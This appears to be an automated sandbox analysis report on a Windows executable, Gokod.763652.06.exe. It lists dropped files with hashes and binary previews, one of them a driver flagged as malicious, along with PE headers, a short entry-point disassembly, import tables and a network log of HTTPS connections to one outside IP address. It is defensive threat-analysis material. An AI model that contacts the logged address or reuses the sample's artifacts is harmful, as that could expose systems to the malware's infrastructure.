                                                                                                                                                    Preview:..........-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.....M.p.C.m.d.R.u.n.:. .C.o.m.m.a.n.d. .L.i.n.e.:. .".C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.W.i.n.d.o.w.s. .D.e.f.e.n.d.e.r.\.m.p.c.m.d.r.u.n...e.x.e.". .-.w.d.e.n.a.b.l.e..... .S.t.a.r.t. .T.i.m.e.:. .. W.e.d. .. O.c.t. .. 0.4. .. 2.0.2.3. .1.2.:.0.3.:.4.2.........M.p.E.n.s.u.r.e.P.r.o.c.e.s.s.M.i.t.i.g.a.t.i.o.n.P.o.l.i.c.y.:. .h.r. .=. .0.x.1.....W.D.E.n.a.b.l.e.....*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*. .W.S.C. .S.t.a.t.e. .I.n.f.o. .*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.....*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*. .A.n.t.i.V.i.r.u.s.P.r.o.d.u.c.t. .*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.....d.i.s.p.l.a.y.N.a.m.e. .=. .[.W.i.n.d.o.w.s. .D.e.f.e.n.d.e.r.].....p.a.t.h.T.o.S.i.g.n.e.d.P.r.o.d.u.c.t.E.x.e. .=. .[.w.i.n.d.o.w.s.d.
                                                                                                                                                    Process:C:\Users\user\Desktop\Gokod.763652.06.exe
                                                                                                                                                    File Type:PE32+ executable (native) x86-64, for MS Windows
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):28272
                                                                                                                                                    Entropy (8bit):6.229088857176949
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:384:i3YUY30d1Kgf4AtcTmwZ/22a97C5ohYh3IB96Oys2+l0skiM0HMFrba8no0ceD/P:iOUkgfdZ9pRyv+uPzCMHo3q4tDghJ
                                                                                                                                                    MD5:1BAA10773FE51429FF108182487CE4C5
                                                                                                                                                    SHA1:EDBDA060EC6CCAACCA11D3499DEFCEBA18979182
                                                                                                                                                    SHA-256:81195C0E16B888E602DCF2A74EFEBA62115DB8275A04BFA5F5DFB21A5147EA1F
                                                                                                                                                    SHA-512:765135A0184489C5F47200BEC461F3AE54CFDBC08A18083CDE44FE27CD9E1F5033103CF275E6D87A4340D352528237B06CC16117F6C7A93B48C47174B79ADA70
                                                                                                                                                    Malicious:true
                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........ri...:...:...:...:...:...:...:...:...:...:...:...:...:...:...:...:...:Rich...:........................PE..d....S.V.........."......:..........l...........................................................................................................(............`.......P..p.......D....A...............................................@...............................text....,.......................... ..h.rdata.......@.......2..............@..H.data........P.......:..............@....pdata.......`.......<..............@..HPAGE....l....p.......>.............. ..`INIT.................@.............. ....rsrc................J..............@..B.reloc...............N..............@..B........................................................................................................................................................................................
                                                                                                                                                    Process:C:\Windows\System32\WerFault.exe
                                                                                                                                                    File Type:MS Windows registry file, NT/2000 or above
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):1835008
                                                                                                                                                    Entropy (8bit):4.4691011796201305
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:6144:cIXfpi67eLPU9skLmb0b44WSPKaJG8nAgejZMMhA2gX4WABlVuNbdwBCswSb8:hXD944WlLZMM6YFUN+8
                                                                                                                                                    MD5:B7DE87CCB8B19DBD17FC3E79592E0B1D
                                                                                                                                                    SHA1:A6F2DDEC8C50165DC13EF5DFC2510951F2C53939
                                                                                                                                                    SHA-256:36916E5735969B46E707D9078BFDF43EC0E8FEE87B5CEF58E344ADFB35BE9EA5
                                                                                                                                                    SHA-512:1D0121E7EDBCA9ED8AB38B20F0AF8BF245A41FAABA5DCBA5373B1B48AC12CFD9B71817A1E05D5787F0B3A11359018E5A3F6B94E12A0F5AB36846D1ED0C2615C8
                                                                                                                                                    Malicious:false
                                                                                                                                                    Preview:regf:...:....\.Z.................... ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtm^...*................................................................................................................................................................................................................................................................................................................................................[..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                    Process:C:\Users\user\Desktop\Gokod.763652.06.exe
                                                                                                                                                    File Type:GLS_BINARY_LSB_FIRST
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):384373
                                                                                                                                                    Entropy (8bit):7.9934459559654
                                                                                                                                                    Encrypted:true
                                                                                                                                                    SSDEEP:6144:EsUs8N+ar/YfpdrC/cn0Erevq1VCyeeSABLmO9R0eyuDqTQC+Es+pz6yDHNi:mZN+amesrevq1VheeSyHbRDqT7+ESgY
                                                                                                                                                    MD5:73662909258B04A4256B2EEDE6DFB58C
                                                                                                                                                    SHA1:3E90E6BDC2D3CC010F0FF6D7C9459256CFD64BB0
                                                                                                                                                    SHA-256:B1645835FE76263A62F1552E563465AFF39A6BB998C10041E48E9183593CFCE9
                                                                                                                                                    SHA-512:2FE911EACBD484061F148F73A1C708A4E447493816F4F76C76CED47DB0063D2CF2DF13259F30E94959D7CE7B318FC80EDDE5355A1EBBA5084A8AFD285400D61C
                                                                                                                                                    Malicious:false
                                                                                                                                                    Preview:..........9.....................IY..D@.$.621.......]..........+.H`........IY..D@.$.621......3.qq..7I......6........IY..D@.$.621......,..l..@E....................NTLMSSP.............0.......(.....aJ....user-PCWORKGROUP........t.X.................NTLMSSP.........X.......X.......X.......X.......X.......X...5....aJ.....{..k...{8.l7..u................|.......IY..D@.$.621......B'....n..@..0pR.......,............)...E.[.?..hw..s.c(.E.....E.h...V.I.I..2......1U!kQ...,...vh..=6.Q..v...^.E...04.i....F.w...+:.2.9.e.r.d._./.....H...U.-Fc...;.=./....}..h.C.{~..).y.U.T.fi.]!..../4.......9.zOa:r.^f....K....!.b....j...\.....U;.m.....~P.4X...\.IE.u../knBj..E"+f.".P...1..W.".W....`..m....%.....Xq..c...` ..D.L./#.`..%.e...<|.k)..eN.r.[...TX\^.[;....._e....8Qd]....l..z..'.._.U!T.....s.2B@..u0.b.|....(i....[/.wR..).9y(.&.~.rR...,..v....l.'...@0.._..w%:....EUrp.i{.g..d....yJ.*o..e..G.bd...|%...+.."...Z........`..._..."5Pw......'.....D+/.....g./$..n..I....*....j
                                                                                                                                                    File type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                    Entropy (8bit):7.509074671428478
                                                                                                                                                    TrID:
                                                                                                                                                    • Win64 Executable GUI (202006/5) 60.38%
                                                                                                                                                    • Windows ActiveX control (116523/4) 34.83%
                                                                                                                                                    • Win64 Executable (generic) (12005/4) 3.59%
                                                                                                                                                    • Generic Win/DOS Executable (2004/3) 0.60%
                                                                                                                                                    • DOS Executable Generic (2002/1) 0.60%
                                                                                                                                                    File name:Gokod.763652.06.exe
                                                                                                                                                    File size:31'995'126 bytes
                                                                                                                                                    MD5:815b9e41304ca2db2a1f89fbd68639a5
                                                                                                                                                    SHA1:211508e3fccb4df2cdb01dc9d8b3dd743dfac826
                                                                                                                                                    SHA256:bd2587248361ab3a0f069890945917ecb0b4775985c82fe18629c97d86096706
                                                                                                                                                    SHA512:9d4193a37eabad71c0b7d3481431af24bdf07ff81f097497a7b386c3d68853bf188be19cde88a49368501cdd3d1c597e10872b0d55cb3e2a8eed92ece4b40ab1
                                                                                                                                                    SSDEEP:393216:ulou3k+no3MhUd+87dFH6HQdmpQrLIOchCbcanW6BxBSKXcfbvaC0wfCi0D6UJ:zIdZ2lHDdmpQHI5c4aXBS5mwfh0
                                                                                                                                                    TLSH:1467E052BBA98565C115C2300CD34F129775BD418F2649CB71DC3B2EBFB7AD02E6E28A
                                                                                                                                                    File Content Preview:MZ......................@...................................(...........!..L.!This program cannot be run in DOS mode....$........:L..["..["..[".!....[".!....[".!....["...!..["...&..["...&..["...'..[".p.'..["...'..[".H....[".H....["..[#..Z"...+..["......["
                                                                                                                                                    Icon Hash:497971328ce1634d
                                                                                                                                                    Entrypoint:0x1400190ac
                                                                                                                                                    Entrypoint Section:.text
                                                                                                                                                    Digitally signed:true
                                                                                                                                                    Imagebase:0x140000000
                                                                                                                                                    Subsystem:windows gui
                                                                                                                                                    Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
                                                                                                                                                    DLL Characteristics:HIGH_ENTROPY_VA, TERMINAL_SERVER_AWARE
                                                                                                                                                    Time Stamp:0x5BA3858A [Thu Sep 20 11:33:30 2018 UTC]
                                                                                                                                                    TLS Callbacks:
                                                                                                                                                    CLR (.Net) Version:
                                                                                                                                                    OS Version Major:6
                                                                                                                                                    OS Version Minor:0
                                                                                                                                                    File Version Major:6
                                                                                                                                                    File Version Minor:0
                                                                                                                                                    Subsystem Version Major:6
                                                                                                                                                    Subsystem Version Minor:0
                                                                                                                                                    Import Hash:59af4ace1b4e61d7241b669b53bd0dc0
                                                                                                                                                    Signature Valid:
                                                                                                                                                    Signature Issuer:
                                                                                                                                                    Signature Validation Error:
                                                                                                                                                    Error Number:
                                                                                                                                                    Not Before, Not After
                                                                                                                                                      Subject Chain
                                                                                                                                                        Version:
                                                                                                                                                        Thumbprint MD5:
                                                                                                                                                        Thumbprint SHA-1:
                                                                                                                                                        Thumbprint SHA-256:
                                                                                                                                                        Serial:
                                                                                                                                                        Instruction
                                                                                                                                                        dec eax
                                                                                                                                                        sub esp, 28h
                                                                                                                                                        call 00007F6FE4EB9D2Ch
                                                                                                                                                        dec eax
                                                                                                                                                        add esp, 28h
                                                                                                                                                        jmp 00007F6FE4EA162Dh
                                                                                                                                                        int3
                                                                                                                                                        int3
                                                                                                                                                        dec eax
                                                                                                                                                        sub esp, 28h
                                                                                                                                                        dec ebp
                                                                                                                                                        mov eax, dword ptr [ecx+38h]
                                                                                                                                                        dec eax
                                                                                                                                                        mov ecx, edx
                                                                                                                                                        dec ecx
                                                                                                                                                        mov edx, ecx
                                                                                                                                                        call 00007F6FE4EB95A2h
                                                                                                                                                        mov eax, 00000001h
                                                                                                                                                        dec eax
                                                                                                                                                        add esp, 28h
                                                                                                                                                        ret
                                                                                                                                                        int3
                                                                                                                                                        int3
                                                                                                                                                        int3
                                                                                                                                                        inc eax
                                                                                                                                                        push ebx
                                                                                                                                                        inc ebp
                                                                                                                                                        mov ebx, dword ptr [eax]
                                                                                                                                                        dec eax
                                                                                                                                                        mov ebx, edx
                                                                                                                                                        inc ecx
                                                                                                                                                        and ebx, FFFFFFF8h
                                                                                                                                                        dec esp
                                                                                                                                                        mov ecx, ecx
                                                                                                                                                        inc ecx
                                                                                                                                                        test byte ptr [eax], 00000004h
                                                                                                                                                        dec esp
                                                                                                                                                        mov edx, ecx
                                                                                                                                                        je 00007F6FE4EB95A5h
                                                                                                                                                        inc ecx
                                                                                                                                                        mov eax, dword ptr [eax+08h]
                                                                                                                                                        dec ebp
                                                                                                                                                        arpl word ptr [eax+04h], dx
                                                                                                                                                        neg eax
                                                                                                                                                        dec esp
                                                                                                                                                        add edx, ecx
                                                                                                                                                        dec eax
                                                                                                                                                        arpl ax, cx
                                                                                                                                                        dec esp
                                                                                                                                                        and edx, ecx
                                                                                                                                                        dec ecx
                                                                                                                                                        arpl bx, ax
                                                                                                                                                        dec edx
                                                                                                                                                        mov edx, dword ptr [eax+edx]
                                                                                                                                                        dec eax
                                                                                                                                                        mov eax, dword ptr [ebx+10h]
                                                                                                                                                        mov ecx, dword ptr [eax+08h]
                                                                                                                                                        dec eax
                                                                                                                                                        add ecx, dword ptr [ebx+08h]
                                                                                                                                                        test byte ptr [ecx+03h], 0000000Fh
                                                                                                                                                        je 00007F6FE4EB959Ch
                                                                                                                                                        movzx eax, byte ptr [ecx+03h]
                                                                                                                                                        and eax, FFFFFFF0h
                                                                                                                                                        dec esp
                                                                                                                                                        add ecx, eax
                                                                                                                                                        dec esp
                                                                                                                                                        xor ecx, edx
                                                                                                                                                        dec ecx
                                                                                                                                                        mov ecx, ecx
                                                                                                                                                        pop ebx
                                                                                                                                                        jmp 00007F6FE4EB8ACCh
                                                                                                                                                        int3
                                                                                                                                                        int3
                                                                                                                                                        int3
                                                                                                                                                        dec eax
                                                                                                                                                        mov eax, esp
                                                                                                                                                        dec eax
                                                                                                                                                        mov dword ptr [eax+08h], ebx
                                                                                                                                                        dec eax
                                                                                                                                                        mov dword ptr [eax+10h], ebp
                                                                                                                                                        dec eax
                                                                                                                                                        mov dword ptr [eax+18h], esi
                                                                                                                                                        dec eax
                                                                                                                                                        mov dword ptr [eax+20h], edi
                                                                                                                                                        inc ecx
                                                                                                                                                        push esi
                                                                                                                                                        dec eax
                                                                                                                                                        sub esp, 20h
                                                                                                                                                        dec ecx
                                                                                                                                                        mov ebx, dword ptr [ecx+38h]
                                                                                                                                                        dec eax
                                                                                                                                                        mov esi, edx
                                                                                                                                                        dec ebp
                                                                                                                                                        mov esi, eax
                                                                                                                                                        dec eax
                                                                                                                                                        mov ebp, ecx
                                                                                                                                                        dec ecx
                                                                                                                                                        mov edx, ecx
                                                                                                                                                        dec eax
                                                                                                                                                        mov ecx, esi
                                                                                                                                                        dec ecx
                                                                                                                                                        mov edi, ecx
                                                                                                                                                        dec esp
                                                                                                                                                        lea eax, dword ptr [ebx+04h]
                                                                                                                                                        call 00007F6FE4EB9501h
                                                                                                                                                        Programming Language:
                                                                                                                                                        • [ C ] VS2015 UPD3.1 build 24215
                                                                                                                                                        • [C++] VS2015 UPD3.1 build 24215
                                                                                                                                                        • [RES] VS2015 UPD3 build 24213
                                                                                                                                                        • [LNK] VS2015 UPD3.1 build 24215
                                                                                                                                                        NameVirtual AddressVirtual Size Is in Section
                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_IMPORT0x3d1c00xc8.rdata
                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_RESOURCE0x540000x4328.rsrc
                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_EXCEPTION0x4f0000x279c.pdata
                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_SECURITY0x52c000x21c8
                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_BASERELOC0x590000x828.reloc
                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_DEBUG0x365700x70.rdata
                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_TLS0x365e00x28.rdata
                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x2ed300x94.rdata
                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_IAT0x2c0000x588.rdata
                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x3d0a00x40.rdata
                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                                                                                                        NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                                        .text0x10000x2a7500x2a800f10fdc231e365f328335224151605149False0.5303940716911765data6.3632646749026955IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                                                        .rdata0x2c0000x1241e0x126003da1d0a6d114f5a8df14143f285dd11fFalse0.41164434523809523data4.7596028637487295IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                        .data0x3f0000xfafc0xe0009385dd85a9e5b9e46752b5f5ae66a3e7False0.8493826729910714data7.645190626947629IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                        .pdata0x4f0000x279c0x28008e00f5e28bedded426248c51fb0c0513False0.47890625data5.453450148843686IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                        .gfids0x520000xec0x200b8c34b110dd06365f31d0b05a07edbefFalse0.32421875data2.024405791666106IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                        .tls0x530000x90x2001f354d76203061bfdd5a53dae48d5435False0.033203125data0.020393135236084953IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                        .rsrc0x540000x43280x44007c63a3b39b07a946ba24299734206296False0.12080652573529412data3.64702646770321IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                        .reloc0x590000x8280xa0066a2c149d62a20005e347aa1d63d5eaeFalse0.5328125data4.955437459335065IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                                                                                                                        NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                                                                        RT_ICON0x541900x468Device independent bitmap graphic, 16 x 32 x 32, image size 1024EnglishUnited States0.21808510638297873
                                                                                                                                                        RT_ICON0x545f80x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4096EnglishUnited States0.099906191369606
                                                                                                                                                        RT_ICON0x556a00x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9216EnglishUnited States0.06109958506224066
                                                                                                                                                        RT_GROUP_ICON0x57c480x30dataEnglishUnited States0.8125
                                                                                                                                                        RT_VERSION0x57c780x428dataEnglishUnited States0.40789473684210525
                                                                                                                                                        RT_MANIFEST0x580a00x282XML 1.0 document, ASCII text, with CRLF line terminatorsEnglishUnited States0.5529595015576324
                                                                                                                                                        DLLImport
                                                                                                                                                        KERNEL32.dllGetWindowsDirectoryW, GetSystemDirectoryW, LocalFree, FormatMessageW, WaitForSingleObject, GetCurrentProcessId, WriteFile, ReadFile, CreateFileW, GetModuleHandleW, WideCharToMultiByte, FreeLibrary, LeaveCriticalSection, EnterCriticalSection, GetProcAddress, WriteConsoleW, FlushFileBuffers, SetFilePointerEx, GetConsoleMode, GetConsoleCP, SetStdHandle, FreeEnvironmentStringsW, GetEnvironmentStringsW, LoadLibraryW, GetFileAttributesW, GetProcessHeap, HeapAlloc, HeapReAlloc, HeapSize, HeapFree, InitializeCriticalSectionEx, GetCurrentThreadId, DecodePointer, RaiseException, DeleteCriticalSection, SetEvent, OpenEventW, GetModuleFileNameW, RemoveDirectoryW, DeleteFileW, CloseHandle, CopyFileW, SetLastError, GetLastError, MultiByteToWideChar, GetCommandLineW, GetCommandLineA, GetSystemInfo, VirtualProtect, VirtualQuery, LoadLibraryExA, IsDebuggerPresent, OutputDebugStringW, GetVersion, GetCurrentProcess, GetCurrentThread, GetProcessTimes, OpenProcess, TerminateProcess, GetExitCodeProcess, InitializeCriticalSectionAndSpinCount, GetFileSize, SetFilePointer, FindClose, CompareFileTime, CreateEventW, LoadLibraryExW, CreateProcessW, GetTempPathW, GetTempFileNameW, QueryPerformanceFrequency, lstrcpynW, lstrlenW, ResetEvent, SystemTimeToFileTime, GetTickCount, lstrcmpiW, lstrcpyW, lstrcatW, QueryPerformanceCounter, WaitForSingleObjectEx, RtlCaptureContext, RtlLookupFunctionEntry, RtlVirtualUnwind, UnhandledExceptionFilter, SetUnhandledExceptionFilter, IsProcessorFeaturePresent, GetStartupInfoW, GetSystemTimeAsFileTime, InitializeSListHead, RtlPcToFileHeader, EncodePointer, RtlUnwindEx, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, GetACP, ExitProcess, GetModuleHandleExW, GetStdHandle, GetStringTypeW, GetFileType, GetCPInfo, IsValidCodePage, GetOEMCP, LCMapStringW, FindFirstFileExW, VirtualAlloc
                                                                                                                                                        USER32.dllMsgWaitForMultipleObjects, PostThreadMessageW, PeekMessageW, DispatchMessageW, WaitForInputIdle, CharUpperW, TranslateMessage, wsprintfW, GetDesktopWindow
                                                                                                                                                        SHELL32.dllSHGetSpecialFolderPathW, ShellExecuteExW
                                                                                                                                                        ole32.dllCoUninitialize, CoAddRefServerProcess, CoCreateInstance, CoCreateGuid, CoReleaseServerProcess, CoInitializeEx
                                                                                                                                                        RPCRT4.dllRpcStringFreeW, UuidCreate, UuidToStringW
                                                                                                                                                        WININET.dllInternetSetStatusCallbackW, HttpOpenRequestW, InternetCloseHandle, HttpQueryInfoW, InternetErrorDlg, InternetAutodial, InternetGetConnectedState, InternetOpenW, InternetCanonicalizeUrlW, InternetCrackUrlW, HttpSendRequestW, InternetConnectW, InternetOpenUrlW, InternetReadFile, InternetGetLastResponseInfoW, InternetQueryOptionW
                                                                                                                                                        ADVAPI32.dllRegOpenKeyW, RegQueryValueExW, SetEntriesInAclW, OpenProcessToken, OpenThreadToken, GetTokenInformation, EqualSid, AllocateAndInitializeSid, FreeSid, InitializeSecurityDescriptor, SetSecurityDescriptorDacl, RegCloseKey
                                                                                                                                                        PSAPI.DLLEnumProcesses
                                                                                                                                                        DescriptionData
                                                                                                                                                        CompanyNameFlexera
                                                                                                                                                        FileDescriptionSetup Suite Launcher Unicode
                                                                                                                                                        FileVersion24.0.573
                                                                                                                                                        InternalNameSetupSuite
                                                                                                                                                        LegalCopyrightCopyright (c) 2018 Flexera. All Rights Reserved.
                                                                                                                                                        OriginalFilenameInstallShield SetupSuite.exe
                                                                                                                                                        ProductNameInstallShield
                                                                                                                                                        ProductVersion24.0
                                                                                                                                                        Internal Build Number185990
                                                                                                                                                        ISInternalVersion24.0.573
                                                                                                                                                        ISInternalDescriptionSetup Suite Launcher Unicode
                                                                                                                                                        Translation0x0409 0x04b0
                                                                                                                                                        Language of compilation systemCountry where language is spokenMap
                                                                                                                                                        EnglishUnited States
                                                                                                                                                        TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                        Mar 16, 2025 05:20:26.001302004 CET49724443192.168.2.439.103.20.59
                                                                                                                                                        Mar 16, 2025 05:20:26.001334906 CET4434972439.103.20.59192.168.2.4
                                                                                                                                                        Mar 16, 2025 05:20:26.001408100 CET49724443192.168.2.439.103.20.59
                                                                                                                                                        Mar 16, 2025 05:20:26.009099960 CET49724443192.168.2.439.103.20.59
                                                                                                                                                        Mar 16, 2025 05:20:26.009121895 CET4434972439.103.20.59192.168.2.4
                                                                                                                                                        Mar 16, 2025 05:20:27.238389015 CET4434972439.103.20.59192.168.2.4
                                                                                                                                                        Mar 16, 2025 05:20:27.238485098 CET49724443192.168.2.439.103.20.59
                                                                                                                                                        Mar 16, 2025 05:20:27.239304066 CET4434972439.103.20.59192.168.2.4
                                                                                                                                                        Mar 16, 2025 05:20:27.239378929 CET49724443192.168.2.439.103.20.59
                                                                                                                                                        Mar 16, 2025 05:20:27.329859972 CET49724443192.168.2.439.103.20.59
                                                                                                                                                        Mar 16, 2025 05:20:27.329888105 CET4434972439.103.20.59192.168.2.4
                                                                                                                                                        Mar 16, 2025 05:20:27.330203056 CET4434972439.103.20.59192.168.2.4
                                                                                                                                                        Mar 16, 2025 05:20:27.330264091 CET49724443192.168.2.439.103.20.59
                                                                                                                                                        Mar 16, 2025 05:20:27.332756996 CET49724443192.168.2.439.103.20.59
                                                                                                                                                        Mar 16, 2025 05:20:27.380342960 CET4434972439.103.20.59192.168.2.4
                                                                                                                                                        Mar 16, 2025 05:20:27.653299093 CET4434972439.103.20.59192.168.2.4
                                                                                                                                                        Mar 16, 2025 05:20:27.653364897 CET49724443192.168.2.439.103.20.59
                                                                                                                                                        Mar 16, 2025 05:20:27.653374910 CET4434972439.103.20.59192.168.2.4
                                                                                                                                                        Mar 16, 2025 05:20:27.653448105 CET49724443192.168.2.439.103.20.59
                                                                                                                                                        Mar 16, 2025 05:20:27.659056902 CET49724443192.168.2.439.103.20.59
                                                                                                                                                        Mar 16, 2025 05:20:27.659075022 CET4434972439.103.20.59192.168.2.4
                                                                                                                                                        Mar 16, 2025 05:20:28.590116024 CET49725443192.168.2.439.103.20.59
                                                                                                                                                        Mar 16, 2025 05:20:28.590164900 CET4434972539.103.20.59192.168.2.4
                                                                                                                                                        Mar 16, 2025 05:20:28.590233088 CET49725443192.168.2.439.103.20.59
                                                                                                                                                        Mar 16, 2025 05:20:28.590686083 CET49725443192.168.2.439.103.20.59
                                                                                                                                                        Mar 16, 2025 05:20:28.590698957 CET4434972539.103.20.59192.168.2.4
                                                                                                                                                        Mar 16, 2025 05:20:29.770750999 CET4434972539.103.20.59192.168.2.4
                                                                                                                                                        Mar 16, 2025 05:20:29.770842075 CET49725443192.168.2.439.103.20.59
                                                                                                                                                        Mar 16, 2025 05:20:29.771752119 CET49725443192.168.2.439.103.20.59
                                                                                                                                                        Mar 16, 2025 05:20:29.771764040 CET4434972539.103.20.59192.168.2.4
                                                                                                                                                        Mar 16, 2025 05:20:29.772159100 CET49725443192.168.2.439.103.20.59
                                                                                                                                                        Mar 16, 2025 05:20:29.772164106 CET4434972539.103.20.59192.168.2.4
                                                                                                                                                        Mar 16, 2025 05:20:30.089103937 CET4434972539.103.20.59192.168.2.4
                                                                                                                                                        Mar 16, 2025 05:20:30.089135885 CET4434972539.103.20.59192.168.2.4
                                                                                                                                                        Mar 16, 2025 05:20:30.089179039 CET49725443192.168.2.439.103.20.59
                                                                                                                                                        Mar 16, 2025 05:20:30.089195967 CET4434972539.103.20.59192.168.2.4
                                                                                                                                                        Mar 16, 2025 05:20:30.089206934 CET49725443192.168.2.439.103.20.59
                                                                                                                                                        Mar 16, 2025 05:20:30.089235067 CET49725443192.168.2.439.103.20.59
                                                                                                                                                        Mar 16, 2025 05:20:30.090497017 CET4434972539.103.20.59192.168.2.4
                                                                                                                                                        Mar 16, 2025 05:20:30.090553045 CET49725443192.168.2.439.103.20.59
                                                                                                                                                        Mar 16, 2025 05:20:30.092446089 CET4434972539.103.20.59192.168.2.4
                                                                                                                                                        Mar 16, 2025 05:20:30.092498064 CET49725443192.168.2.439.103.20.59
                                                                                                                                                        Mar 16, 2025 05:20:30.094223976 CET4434972539.103.20.59192.168.2.4
                                                                                                                                                        Mar 16, 2025 05:20:30.094271898 CET49725443192.168.2.439.103.20.59
                                                                                                                                                        Mar 16, 2025 05:20:30.175676107 CET4434972539.103.20.59192.168.2.4
                                                                                                                                                        Mar 16, 2025 05:20:30.175723076 CET4434972539.103.20.59192.168.2.4
                                                                                                                                                        Mar 16, 2025 05:20:30.175765991 CET49725443192.168.2.439.103.20.59
                                                                                                                                                        Mar 16, 2025 05:20:30.175771952 CET4434972539.103.20.59192.168.2.4
                                                                                                                                                        Mar 16, 2025 05:20:30.175806046 CET49725443192.168.2.439.103.20.59
                                                                                                                                                        Mar 16, 2025 05:20:30.175832987 CET49725443192.168.2.439.103.20.59
                                                                                                                                                        Mar 16, 2025 05:20:30.176028967 CET4434972539.103.20.59192.168.2.4
                                                                                                                                                        Mar 16, 2025 05:20:30.176073074 CET49725443192.168.2.439.103.20.59
                                                                                                                                                        Mar 16, 2025 05:20:30.176332951 CET4434972539.103.20.59192.168.2.4
                                                                                                                                                        Mar 16, 2025 05:20:30.176389933 CET49725443192.168.2.439.103.20.59
                                                                                                                                                        Mar 16, 2025 05:20:30.177181959 CET4434972539.103.20.59192.168.2.4
                                                                                                                                                        Mar 16, 2025 05:20:30.177359104 CET49725443192.168.2.439.103.20.59
                                                                                                                                                        Mar 16, 2025 05:20:30.177447081 CET4434972539.103.20.59192.168.2.4
                                                                                                                                                        Mar 16, 2025 05:20:30.177499056 CET49725443192.168.2.439.103.20.59
                                                                                                                                                        Mar 16, 2025 05:20:30.179204941 CET4434972539.103.20.59192.168.2.4
                                                                                                                                                        Mar 16, 2025 05:20:30.179280043 CET49725443192.168.2.439.103.20.59
                                                                                                                                                        Mar 16, 2025 05:20:30.180980921 CET4434972539.103.20.59192.168.2.4
                                                                                                                                                        Mar 16, 2025 05:20:30.181016922 CET4434972539.103.20.59192.168.2.4
                                                                                                                                                        Mar 16, 2025 05:20:30.181045055 CET49725443192.168.2.439.103.20.59
                                                                                                                                                        Mar 16, 2025 05:20:30.181047916 CET4434972539.103.20.59192.168.2.4
                                                                                                                                                        Mar 16, 2025 05:20:30.181071043 CET49725443192.168.2.439.103.20.59
                                                                                                                                                        Mar 16, 2025 05:20:30.181092024 CET49725443192.168.2.439.103.20.59
                                                                                                                                                        Mar 16, 2025 05:20:30.182864904 CET4434972539.103.20.59192.168.2.4
                                                                                                                                                        Mar 16, 2025 05:20:30.182929993 CET49725443192.168.2.439.103.20.59
                                                                                                                                                        Mar 16, 2025 05:20:30.262310028 CET4434972539.103.20.59192.168.2.4
                                                                                                                                                        Mar 16, 2025 05:20:30.262375116 CET49725443192.168.2.439.103.20.59
                                                                                                                                                        Mar 16, 2025 05:20:30.262404919 CET4434972539.103.20.59192.168.2.4
                                                                                                                                                        Mar 16, 2025 05:20:30.262448072 CET49725443192.168.2.439.103.20.59
                                                                                                                                                        Mar 16, 2025 05:20:30.262463093 CET4434972539.103.20.59192.168.2.4
